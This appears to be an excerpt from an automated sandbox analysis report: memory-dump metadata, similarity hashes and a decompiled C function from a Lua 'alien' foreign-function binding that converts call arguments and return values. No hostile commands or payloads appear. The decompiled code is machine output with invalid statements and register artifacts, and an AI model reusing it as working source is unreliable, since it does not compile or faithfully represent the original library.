lua_pushnumber.LUA5.1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A226BF
lua_pushnumber.LUA5.1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A226E8
lua_pushstring.LUA5.1(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A22713
lua_pushnil.LUA5.1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A2271E
lua_pushlightuserdata.LUA5.1(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A22749
luaL_error.LUA5.1(?,alien: unknown return type (function %s),?), ref: 00A22766
lua_pushnumber.LUA5.1(?), ref: 00A227CE
lua_pushnumber.LUA5.1(?), ref: 00A227F4
lua_pushnumber.LUA5.1(?), ref: 00A2280B
lua_pushnumber.LUA5.1(?), ref: 00A2282B

Memory Dump Source

Source File: 00000003.00000002.487114164.0000000000A21000.00000020.00020000.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000003.00000002.487089623.0000000000A20000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487157920.0000000000A25000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487201925.0000000000A27000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487230936.0000000000A28000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_pushnumber.$lua_pushnil.$L_error.lua_pushlightuserdata.lua_pushstring.lua_tonumber.
String ID:
API String ID: 2475247279-0
Opcode ID: 4c8491b958c8cbed5275eaeed454d956f1019f7accc593889532b69abd08a5de
Instruction ID: 8e03f11484b0d1a37e5a4a9ad6d4adac8a0e85eda1c98f76d0ea27f6096ad4ae
Opcode Fuzzy Hash: 4c8491b958c8cbed5275eaeed454d956f1019f7accc593889532b69abd08a5de
Instruction Fuzzy Hash: B5B193B5D04129ABCB04EB98FE81DEEBBB8FF49300F144528F441B7246D6399A15CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00A22201, Relevance: 25.8, APIs: 17, Instructions: 315
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00A22201(void* __edi, long long __fp0) {
				long long* __ebx;
				void* __esi;
				char _t220;
				signed int _t222;
				char* _t223;
				signed int _t224;
				char* _t225;
				signed int _t236;
				void* _t243;
				void* _t245;
				char* _t246;
				intOrPtr _t247;
				intOrPtr _t248;
				void* _t267;
				signed int _t268;
				void* _t269;
				void* _t271;
				signed int _t272;
				intOrPtr _t274;
				intOrPtr _t275;
				void* _t276;
				long long _t286;

				L0:
				while(1) {
					L0:
					_t286 = __fp0;
					_t267 = __edi;
					_t220 = E00A246A0(4);
					 *((intOrPtr*)(_t272 - 8)) = _t274;
					_push(_t243);
					L00A23F62();
					_t246 =  *((intOrPtr*)(_t272 - 8));
					 *_t246 = _t220;
					_t275 = _t274 + 8;
					 *((intOrPtr*)( *((intOrPtr*)(_t272 - 0xc)) + __edi)) = _t246;
					while(1) {
						L36:
						 *((intOrPtr*)(_t272 - 0xc)) =  *((intOrPtr*)(_t272 - 0xc)) + 4;
						_t243 = _t243 + 1;
						_t116 = _t272 - 0x4c;
						 *_t116 =  *((intOrPtr*)(_t272 - 0x4c)) - 1;
						if( *_t116 == 0) {
							break;
						}
						L1:
						_t247 =  *((intOrPtr*)(_t272 - 0x14));
						_t258 =  *((intOrPtr*)(_t247 + 0x30));
						_t222 =  *( *((intOrPtr*)(_t272 - 0xc)) +  *((intOrPtr*)(_t247 + 0x30)));
						if(_t222 > 0x11) {
							L33:
							_t223 =  *(_t247 + 8);
							if(_t223 == 0) {
								_t223 = "anonymous";
							}
							_push(_t223);
							_push(_t243);
							_push("alien: parameter %i is of unknown type (function %s)");
							_push(_t270);
							L00A23F26();
							_t275 = _t275 + 0x10;
							continue;
						}
						L2:
						switch( *((intOrPtr*)(_t222 * 4 +  &M00A2287C))) {
							case 0:
								L3:
								_t241 = E00A246A0(4);
								 *((intOrPtr*)(_t272 - 8)) = _t275;
								_push(_t243);
								_push(_t270);
								L00A23F68();
								_t275 = _t275 + 8;
								_t242 = E00A245C0(_t241, _t286);
								_t257 =  *((intOrPtr*)(_t272 - 8));
								_t258 =  *((intOrPtr*)(_t272 - 0xc));
								 *_t257 = _t242;
								 *((intOrPtr*)( *((intOrPtr*)(_t272 - 0xc)) + _t267)) = _t257;
								goto L36;
							case 1:
								L6:
								4 = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								asm("fnstcw word [ebp-0xe]");
								__eax =  *(__ebp - 0xe) & 0x0000ffff;
								__edx =  *(__ebp - 0xc);
								__esp = __esp + 8;
								__eax =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								 *(__ebp - 0x18) =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								__eax =  *(__ebp - 8);
								asm("fldcw word [ebp-0x18]");
								asm("fistp dword [ebp-0x18]");
								 *__eax =  *(__ebp - 0x18);
								 *(__edx + __edi) = __eax;
								asm("fldcw word [ebp-0xe]");
								goto L36;
							case 2:
								L5:
								__eax = 4;
								__eax = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__esp = __esp + 8;
								__eax = E00A245C0(__eax, __fp0);
								__ecx =  *(__ebp - 8);
								__edx =  *(__ebp - 0xc);
								 *__ecx = __eax;
								 *(__edx + __edi) = __ecx;
								goto L36;
							case 3:
								L8:
								4 = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								asm("fnstcw word [ebp-0xe]");
								__eax =  *(__ebp - 0xe) & 0x0000ffff;
								__edx =  *(__ebp - 0xc);
								__esp = __esp + 8;
								__eax =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								 *(__ebp - 0x18) =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								__eax =  *(__ebp - 8);
								asm("fldcw word [ebp-0x18]");
								asm("fistp qword [ebp-0x1c]");
								__ecx =  *(__ebp - 0x1c);
								 *__eax = __ecx;
								 *(__edx + __edi) = __eax;
								asm("fldcw word [ebp-0xe]");
								goto L36;
							case 4:
								L4:
								__eax = 4;
								__eax = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__esp = __esp + 8;
								__eax = E00A245C0(__eax, __fp0);
								__ecx =  *(__ebp - 8);
								 *__ecx = __eax;
								__eax =  *(__ebp - 0xc);
								 *(__eax + __edi) = __ecx;
								goto L36;
							case 5:
								L7:
								4 = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								asm("fnstcw word [ebp-0xe]");
								__eax =  *(__ebp - 0xe) & 0x0000ffff;
								__edx =  *(__ebp - 0xc);
								__esp = __esp + 8;
								__eax =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								 *(__ebp - 0x18) =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								__eax =  *(__ebp - 8);
								asm("fldcw word [ebp-0x18]");
								asm("fistp qword [ebp-0x1c]");
								__ecx =  *(__ebp - 0x1c);
								 *__eax = __ecx;
								 *(__edx + __edi) = __eax;
								asm("fldcw word [ebp-0xe]");
								goto L36;
							case 6:
								goto L33;
							case 7:
								L10:
								4 = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__eax =  *(__ebp - 8);
								__ecx =  *(__ebp - 0xc);
								 *__eax = __fp0;
								__esp = __esp + 8;
								 *(__ecx + __edi) = __eax;
								goto L36;
							case 8:
								L11:
								8 = E00A24686(8);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__eax =  *(__ebp - 8);
								__edx =  *(__ebp - 0xc);
								 *__eax = __fp0;
								__esp = __esp + 8;
								 *(__edx + __edi) = __eax;
								goto L36;
							case 9:
								L9:
								4 = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F62();
								__ecx =  *(__ebp - 8);
								 *__ecx = __al;
								__eax =  *(__ebp - 0xc);
								__esp = __esp + 8;
								 *(__eax + __edi) = __ecx;
								goto L36;
							case 0xa:
								goto L0;
							case 0xb:
								L12:
								__eax = 4;
								__eax = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F50();
								__esp = __esp + 8;
								_push(__ebx);
								_push(__esi);
								if(__eax == 0) {
									L00A23F4A();
									__esp = __esp + 8;
									if(__eax != 0) {
										_push(0);
										_push(__ebx);
										_push(__esi);
										L00A23F5C();
										__edx =  *(__ebp - 8);
										__ecx =  *(__ebp - 0xc);
										 *__edx = __eax;
										__eax = __edx;
										__esp = __esp + 0xc;
										 *(__ecx + __edi) = __eax;
									} else {
										__edx =  *(__ebp - 8);
										__ecx =  *(__ebp - 0xc);
										 *__edx = __eax;
										__eax = __edx;
										 *(__ecx + __edi) = __eax;
									}
								} else {
									L00A23F4A();
									__esp = __esp + 8;
									if(__eax != 0) {
										_push(__ebx);
										_push(__esi);
										L00A23F0E();
										__ecx =  *(__ebp - 8);
										 *__ecx = __eax;
										__eax = __ecx;
										__ecx =  *(__ebp - 0xc);
										__esp = __esp + 8;
										 *(__ecx + __edi) = __eax;
									} else {
										__ecx =  *(__ebp - 8);
										 *__ecx = __eax;
										__eax = __ecx;
										__ecx =  *(__ebp - 0xc);
										 *(__ecx + __edi) = __eax;
									}
								}
								goto L36;
							case 0xc:
								L24:
								__eax = 4;
								__eax = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F4A();
								__esp = __esp + 8;
								if(__eax != 0) {
									_push(__ebx);
									_push(__esi);
									L00A23F56();
									__esp = __esp + 8;
									if(__eax == 0) {
										_push(__ebx);
										_push(__esi);
										L00A23F0E();
										__ecx =  *(__ebp - 8);
										 *__ecx = __eax;
										__eax =  *(__ebp - 0xc);
										__esp = __esp + 8;
										 *(__eax + __edi) = __ecx;
									} else {
										_push(0);
										_push(__ebx);
										_push(__esi);
										L00A23F5C();
										__ecx =  *(__ebp - 8);
										 *__ecx = __eax;
										__eax =  *(__ebp - 0xc);
										__esp = __esp + 0xc;
										 *(__eax + __edi) = __ecx;
									}
								} else {
									__ecx =  *(__ebp - 8);
									 *__ecx = __eax;
									__eax =  *(__ebp - 0xc);
									 *(__eax + __edi) = __ecx;
								}
								goto L36;
							case 0xd:
								L29:
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__esp = __esp + 8;
								__eax = E00A245C0(__eax, __fp0);
								__ecx =  *(__ebp - 0x24);
								 *( *(__ebp - 0x24)) = __eax;
								4 = E00A246A0(4);
								__ecx =  *(__ebp - 0x24);
								__edx =  *(__ebp - 0xc);
								__eax = __esp;
								 *__eax = __ecx;
								__ecx = __ecx + 4;
								 *(__edx + __edi) = __eax;
								 *(__ebp - 0x24) = __ecx;
								goto L36;
							case 0xe:
								L30:
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								asm("fnstcw word [ebp-0xe]");
								__eax =  *(__ebp - 0xe) & 0x0000ffff;
								__ecx =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								 *(__ebp - 0x18) =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								__esp = __esp + 8;
								asm("fldcw word [ebp-0x18]");
								asm("fistp qword [ebp-0x1c]");
								__eax =  *(__ebp - 0x1c);
								 *( *(__ebp - 0x28)) =  *(__ebp - 0x1c);
								__eax = 4;
								asm("fldcw word [ebp-0xe]");
								__eax = E00A246A0(4);
								__ecx =  *(__ebp - 0x28);
								__edx =  *(__ebp - 0xc);
								__eax = __esp;
								 *__eax = __ecx;
								__ecx = __ecx + 4;
								 *(__edx + __edi) = __eax;
								 *(__ebp - 0x28) = __ecx;
								goto L36;
							case 0xf:
								L31:
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__esp = __esp + 8;
								__eax = E00A245C0(__eax, __fp0);
								__ecx =  *(__ebp - 0x2c);
								 *( *(__ebp - 0x2c)) = __al;
								4 = E00A246A0(4);
								__ecx =  *(__ebp - 0x2c);
								__edx =  *(__ebp - 0xc);
								__eax = __esp;
								 *__eax = __ecx;
								__ecx = __ecx + 1;
								 *(__edx + __edi) = __eax;
								 *(__ebp - 0x2c) = __ecx;
								goto L36;
							case 0x10:
								L32:
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__eax =  *(__ebp - 0x40);
								 *( *(__ebp - 0x40)) = __fp0;
								__esp = __esp + 8;
								4 = E00A246A0(4);
								__ecx =  *(__ebp - 0x40);
								__edx =  *(__ebp - 0xc);
								__eax = __esp;
								 *__eax = __ecx;
								__ecx = __ecx + 8;
								 *(__edx + __edi) = __eax;
								 *(__ebp - 0x40) = __ecx;
								goto L36;
							case 0x11:
								L19:
								__eax = 4;
								__eax = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								__eax = E00A21110(__eax, __ebx, __esi, "alien_callback");
								if(__eax == 0) {
									__eax = E00A21110(__eax, __ebx, __esi, "alien_function");
									if(__eax == 0) {
										_push("alien function or callback expected");
										_push(__ebx);
										_push(__esi);
										L00A23F14();
										__ecx =  *(__ebp - 8);
										__edx =  *(__ebp - 0xc);
										__esp = __esp + 0xc;
										__eax = 0;
										 *__ecx = 0;
										 *(__edx + __edi) = __ecx;
									} else {
										__eax =  *(__eax + 4);
										__ecx =  *(__ebp - 8);
										__edx =  *(__ebp - 0xc);
										 *__ecx = __eax;
										 *(__edx + __edi) = __ecx;
									}
								} else {
									__eax =  *__eax;
									__ecx =  *(__ebp - 8);
									__edx =  *(__ebp - 0xc);
									 *__ecx = __eax;
									 *(__edx + __edi) = __ecx;
								}
								goto L36;
						}
					}
					L37:
					_t248 =  *((intOrPtr*)(_t272 - 0x14));
					 *((intOrPtr*)(_t272 - 0x3c)) = 0;
					_t224 =  *(_t248 + 0xc);
					if(_t224 > 0xc) {
						L58:
						_t225 =  *(_t248 + 8);
						if(_t225 == 0) {
							_t225 = "anonymous";
						}
						_push(_t225);
						_push("alien: unknown return type (function %s)");
						_push(_t270);
						L00A23F26();
						L61:
						_t276 = _t275 + 0xc;
						L62:
						 *((intOrPtr*)(_t272 - 0x24)) =  *((intOrPtr*)(_t272 - 0x24)) +  ~( *(_t272 - 0x48)) * 4;
						 *((intOrPtr*)(_t272 - 0x2c)) =  *((intOrPtr*)(_t272 - 0x2c)) -  *((intOrPtr*)(_t272 - 0x30));
						_t268 = 0;
						 *((intOrPtr*)(_t272 - 0x28)) =  *((intOrPtr*)(_t272 - 0x28)) +  ~( *(_t272 - 0x38)) * 4;
						if( *((intOrPtr*)(_t272 - 0x44)) <= 0) {
							L72:
							_pop(_t269);
							_pop(_t271);
							_pop(_t245);
							return E00A245A4( *((intOrPtr*)(_t272 - 0x30)) +  *((intOrPtr*)(_t272 - 0x34)) +  *(_t272 - 0x38) +  *(_t272 - 0x48) + 1, _t245,  *(_t272 - 4) ^ _t272,  *(_t272 - 0x48), _t269, _t271);
						} else {
							goto L63;
						}
						do {
							L63:
							_t236 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t272 - 0x14)) + 0x30)) + _t268 * 4)) + 0xfffffff3;
							if(_t236 > 3) {
								goto L71;
							}
							L64:
							switch( *((intOrPtr*)(_t236 * 4 +  &M00A228F8))) {
								case 0:
									L65:
									asm("fild dword [ecx]");
									_t279 = _t276 - 8;
									 *_t279 = _t286;
									_push(_t270);
									L00A23F80();
									_t276 = _t279 + 0xc;
									 *((intOrPtr*)(_t272 - 0x24)) =  *((intOrPtr*)(_t272 - 0x24)) + 4;
									goto L71;
								case 1:
									L66:
									__edx =  *(__ebp - 0x28);
									__eax =  *__edx;
									asm("fild dword [edx]");
									if(__eax < 0) {
										__fp0 = __fp0 +  *0xa25878;
									}
									__esp = __esp - 8;
									 *__esp = __fp0;
									_push(__esi);
									L00A23F80();
									__esp = __esp + 0xc;
									 *(__ebp - 0x28) =  *(__ebp - 0x28) + 4;
									goto L71;
								case 2:
									L70:
									__ecx =  *(__ebp - 0x2c);
									__edx =  *__ecx;
									 *(__ebp - 0x18) = __edx;
									__esp = __esp - 8;
									asm("fild dword [ebp-0x18]");
									 *__esp = __fp0;
									_push(__esi);
									L00A23F80();
									__esp = __esp + 0xc;
									 *(__ebp - 0x2c) =  *(__ebp - 0x2c) + 1;
									goto L71;
								case 3:
									L69:
									__fp0 =  *__ebx;
									__esp = __esp - 8;
									 *__esp = __fp0;
									_push(__esi);
									L00A23F80();
									__esp = __esp + 0xc;
									__ebx = __ebx + 8;
									goto L71;
							}
							L71:
							_t268 = _t268 + 1;
						} while (_t268 <  *((intOrPtr*)(_t272 - 0x44)));
						goto L72;
					}
					L38:
					switch( *((intOrPtr*)(_t224 * 4 +  &M00A228C4))) {
						case 0:
							L40:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__edx = __ebp - 0x20;
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __ebp - 0x20, __edi, __fp0, __eax,  *(__eax + 4), __ebp - 0x20, __edi);
							__edx =  *(__ebp - 0x20);
							 *(__ebp - 0x18) = __edx;
							__esp = __esp + 8;
							asm("fild dword [ebp-0x18]");
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 1:
							L43:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							_t138 = __ebp - 0x20; // -28
							__edx = _t138;
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, _t138, __edi, __fp0, __eax,  *(__eax + 4), _t138, __edi);
							__edx =  *(__ebp - 0x20) & 0x0000ffff;
							 *(__ebp - 0x18) = __edx;
							__esp = __esp + 8;
							asm("fild dword [ebp-0x18]");
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 2:
							L42:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							_t135 = __ebp - 0x20; // -28
							__edx = _t135;
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), __edx, __edi); // executed
							asm("fild dword [ebp-0x20]");
							__esp = __esp + 8;
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 3:
							L48:
							_t145 = __ebp - 0x20; // -28
							__eax = _t145;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t145, __edi);
							asm("fild dword [ebp-0x20]");
							__edx =  *(__ebp - 0x20);
							goto L45;
						case 4:
							L41:
							_t130 = __ebp - 0x54; // -80
							__eax = _t130;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t130, __edi);
							asm("fild dword [ebp-0x54]");
							__esp = __esp + 8;
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 5:
							L44:
							_t141 = __ebp - 0x58; // -84
							__eax = _t141;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t141, __edi);
							asm("fild dword [ebp-0x58]");
							__edx =  *(__ebp - 0x58);
							L45:
							if(__edx < 0) {
								__fp0 = __fp0 +  *0xa25878;
							}
							__esp = __esp + 8;
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 6:
							L39:
							E00A24130(_t243, _t258, _t267, _t286,  *((intOrPtr*)(_t272 - 0x14)) + 0x10,  *((intOrPtr*)( *((intOrPtr*)(_t272 - 0x14)) + 4)), 0, _t267);
							_push(_t270);
							L00A23F74();
							_t276 = _t275 + 0x14;
							goto L62;
						case 7:
							L51:
							_t159 = __ebp - 0x50; // -76
							__eax = _t159;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t159, __edi);
							__fp0 =  *(__ebp - 0x50);
							__esp = __esp + 8;
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 8:
							L52:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							_t165 = __ebp - 0x60; // -92
							__edx = _t165;
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), __edx, __edi);
							__fp0 =  *(__ebp - 0x60);
							__esp = __esp + 8;
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 9:
							L49:
							_t149 = __ebp - 0x20; // -28
							__eax = _t149;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t149, __edi);
							__edx =  *(__ebp - 0x20) & 0x000000ff;
							 *(__ebp - 0x18) = __edx;
							__esp = __esp + 8;
							asm("fild dword [ebp-0x18]");
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 0xa:
							L50:
							_t154 = __ebp - 0x20; // -28
							__eax = _t154;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t154, __edi);
							__edx =  *(__ebp - 0x20);
							 *(__ebp - 0x18) = __edx;
							__esp = __esp + 8;
							asm("fild dword [ebp-0x18]");
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 0xb:
							L53:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							_t169 = __ebp - 0x3c; // -56
							__edx = _t169;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), __edx, __edi);
							__eax =  *(__ebp - 0x3c);
							if(__eax == 0) {
								goto L55;
							}
							L54:
							_push(__eax);
							_push(__esi);
							L00A23EF0();
							__esp = __esp + 8;
							goto L62;
						case 0xc:
							L56:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							_t173 = __ebp - 0x3c; // -56
							__edx = _t173;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), __edx, __edi);
							__eax =  *(__ebp - 0x3c);
							if(__eax == 0) {
								L55:
								_push(__esi);
								L00A23F74();
								__esp = __esp + 4;
								goto L62;
							}
							L57:
							_push(__eax);
							_push(__esi);
							L00A23F7A();
							__esp = __esp + 8;
							goto L62;
					}
				}
			}

0x00a22201
0x00a22201
0x00a22201
0x00a22201
0x00a22201
0x00a22206
0x00a2220b
0x00a2220e
0x00a22210
0x00a22215
0x00a2221b
0x00a2221d
0x00a22220
0x00a224ec
0x00a224ec
0x00a224ec
0x00a224f0
0x00a224f3
0x00a224f3
0x00a224f7
0x00000000
0x00000000
0x00a22071
0x00a22071
0x00a22074
0x00a2207a
0x00a22080
0x00a224d0
0x00a224d0
0x00a224d5
0x00a224d7
0x00a224d7
0x00a224dc
0x00a224dd
0x00a224de
0x00a224e3
0x00a224e4
0x00a224e9
0x00000000
0x00a224e9
0x00a22086
0x00a22086
0x00000000
0x00a2208d
0x00a22092
0x00a22097
0x00a2209a
0x00a2209b
0x00a2209c
0x00a220a1
0x00a220a4
0x00a220a9
0x00a220ac
0x00a220af
0x00a220b2
0x00000000
0x00000000
0x00a22112
0x00a22117
0x00a2211c
0x00a2211f
0x00a22120
0x00a22121
0x00a22126
0x00a22129
0x00a2212d
0x00a22130
0x00a22133
0x00a22138
0x00a2213b
0x00a2213e
0x00a22141
0x00a22148
0x00a2214b
0x00a2214e
0x00000000
0x00000000
0x00a220e6
0x00a220e6
0x00a220eb
0x00a220f0
0x00a220f3
0x00a220f4
0x00a220f5
0x00a220fa
0x00a220fd
0x00a22102
0x00a22105
0x00a22108
0x00a2210a
0x00000000
0x00000000
0x00a22198
0x00a2219d
0x00a221a2
0x00a221a5
0x00a221a6
0x00a221a7
0x00a221ac
0x00a221af
0x00a221b3
0x00a221b6
0x00a221b9
0x00a221be
0x00a221c1
0x00a221c4
0x00a221c7
0x00a221ca
0x00a221cd
0x00a221cf
0x00a221d2
0x00000000
0x00000000
0x00a220ba
0x00a220ba
0x00a220bf
0x00a220c4
0x00a220c7
0x00a220c8
0x00a220c9
0x00a220ce
0x00a220d1
0x00a220d6
0x00a220d9
0x00a220db
0x00a220de
0x00000000
0x00000000
0x00a22156
0x00a2215b
0x00a22160
0x00a22163
0x00a22164
0x00a22165
0x00a2216a
0x00a2216d
0x00a22171
0x00a22174
0x00a22177
0x00a2217c
0x00a2217f
0x00a22182
0x00a22185
0x00a22188
0x00a2218b
0x00a2218d
0x00a22190
0x00000000
0x00000000
0x00000000
0x00000000
0x00a22228
0x00a2222d
0x00a22232
0x00a22235
0x00a22236
0x00a22237
0x00a2223c
0x00a2223f
0x00a22242
0x00a22244
0x00a22247
0x00000000
0x00000000
0x00a2224f
0x00a22254
0x00a22259
0x00a2225c
0x00a2225d
0x00a2225e
0x00a22263
0x00a22266
0x00a22269
0x00a2226b
0x00a2226e
0x00000000
0x00000000
0x00a221da
0x00a221df
0x00a221e4
0x00a221e7
0x00a221e8
0x00a221e9
0x00a221ee
0x00a221f1
0x00a221f3
0x00a221f6
0x00a221f9
0x00000000
0x00000000
0x00000000
0x00000000
0x00a22276
0x00a22276
0x00a2227b
0x00a22280
0x00a22283
0x00a22284
0x00a22285
0x00a2228a
0x00a2228f
0x00a22290
0x00a22291
0x00a222cd
0x00a222d2
0x00a222d7
0x00a222eb
0x00a222ed
0x00a222ee
0x00a222ef
0x00a222f4
0x00a222f7
0x00a222fa
0x00a222fc
0x00a222fe
0x00a22301
0x00a222d9
0x00a222d9
0x00a222dc
0x00a222df
0x00a222e1
0x00a222e3
0x00a222e3
0x00a22293
0x00a22293
0x00a22298
0x00a2229d
0x00a222b1
0x00a222b2
0x00a222b3
0x00a222b8
0x00a222bb
0x00a222bd
0x00a222bf
0x00a222c2
0x00a222c5
0x00a2229f
0x00a2229f
0x00a222a2
0x00a222a4
0x00a222a6
0x00a222a9
0x00a222a9
0x00a2229d
0x00000000
0x00000000
0x00a2237e
0x00a2237e
0x00a22383
0x00a22388
0x00a2238b
0x00a2238c
0x00a2238d
0x00a22392
0x00a22397
0x00a223a9
0x00a223aa
0x00a223ab
0x00a223b0
0x00a223b5
0x00a223d3
0x00a223d4
0x00a223d5
0x00a223da
0x00a223dd
0x00a223df
0x00a223e2
0x00a223e5
0x00a223b7
0x00a223b7
0x00a223b9
0x00a223ba
0x00a223bb
0x00a223c0
0x00a223c3
0x00a223c5
0x00a223c8
0x00a223cb
0x00a223cb
0x00a22399
0x00a22399
0x00a2239c
0x00a2239e
0x00a223a1
0x00a223a1
0x00000000
0x00000000
0x00a223ed
0x00a223ed
0x00a223ee
0x00a223ef
0x00a223f4
0x00a223f7
0x00a223fc
0x00a223ff
0x00a22406
0x00a2240b
0x00a2240e
0x00a22411
0x00a22413
0x00a22415
0x00a22418
0x00a2241b
0x00000000
0x00000000
0x00a22423
0x00a22423
0x00a22424
0x00a22425
0x00a2242a
0x00a2242d
0x00a22431
0x00a22434
0x00a22439
0x00a2243c
0x00a2243f
0x00a22442
0x00a22445
0x00a22448
0x00a2244a
0x00a2244f
0x00a22452
0x00a22457
0x00a2245a
0x00a2245d
0x00a2245f
0x00a22461
0x00a22464
0x00a22467
0x00000000
0x00000000
0x00a2246f
0x00a2246f
0x00a22470
0x00a22471
0x00a22476
0x00a22479
0x00a2247e
0x00a22481
0x00a22488
0x00a2248d
0x00a22490
0x00a22493
0x00a22495
0x00a22497
0x00a2249a
0x00a2249d
0x00000000
0x00000000
0x00a224a2
0x00a224a2
0x00a224a3
0x00a224a4
0x00a224a9
0x00a224ac
0x00a224ae
0x00a224b6
0x00a224bb
0x00a224be
0x00a224c1
0x00a224c3
0x00a224c5
0x00a224c8
0x00a224cb
0x00000000
0x00000000
0x00a22309
0x00a22309
0x00a2230e
0x00a22313
0x00a2231b
0x00a22325
0x00a2233e
0x00a22348
0x00a2235d
0x00a22362
0x00a22363
0x00a22364
0x00a22369
0x00a2236c
0x00a2236f
0x00a22372
0x00a22374
0x00a22376
0x00a2234a
0x00a2234a
0x00a2234d
0x00a22350
0x00a22353
0x00a22355
0x00a22355
0x00a22327
0x00a22327
0x00a22329
0x00a2232c
0x00a2232f
0x00a22331
0x00a22331
0x00000000
0x00000000
0x00a22086
0x00a224fd
0x00a224fd
0x00a22500
0x00a22507
0x00a2250d
0x00a22753
0x00a22753
0x00a22758
0x00a2275a
0x00a2275a
0x00a2275f
0x00a22760
0x00a22765
0x00a22766
0x00a2276b
0x00a2276b
0x00a2276e
0x00a2278a
0x00a22790
0x00a22795
0x00a2279d
0x00a227a0
0x00a22843
0x00a22858
0x00a22859
0x00a2285a
0x00a22868
0x00000000
0x00000000
0x00000000
0x00a227a6
0x00a227a6
0x00a227af
0x00a227b5
0x00000000
0x00000000
0x00a227bb
0x00a227bb
0x00000000
0x00a227c2
0x00a227c5
0x00a227c7
0x00a227ca
0x00a227cd
0x00a227ce
0x00a227d3
0x00a227d6
0x00000000
0x00000000
0x00a227dc
0x00a227dc
0x00a227df
0x00a227e1
0x00a227e5
0x00a227e7
0x00a227e7
0x00a227ed
0x00a227f0
0x00a227f3
0x00a227f4
